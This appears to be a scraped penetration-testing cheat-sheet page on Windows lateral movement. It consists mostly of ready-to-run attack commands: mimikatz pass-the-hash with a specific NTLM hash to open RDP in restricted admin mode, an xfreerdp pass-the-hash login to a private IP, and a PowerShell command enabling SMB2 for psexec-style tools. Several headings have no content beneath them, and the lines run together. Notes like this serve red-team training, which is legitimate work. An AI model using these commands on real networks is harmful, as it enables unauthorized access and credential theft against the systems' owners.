Windows Lateral Movement
RDP (GUI)
Common Operations (tty, SSH, rbash)Turn on SMB (for impacket psexec / cme/nxc)
Set-SmbServerConfiguration -EnableSMB2Protocol $truewith Admin NTLM hash connecting to next victim
privilege::debug
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"xfreerdp /u:admin /pth:2892D26CDF84D7A70E2EB3B9F05C425E /v:192.168.120.6 /cert-ignoreEnable restricted admin mode
RDP Console
Fileless (admin -> SYSTEM)
Last updated
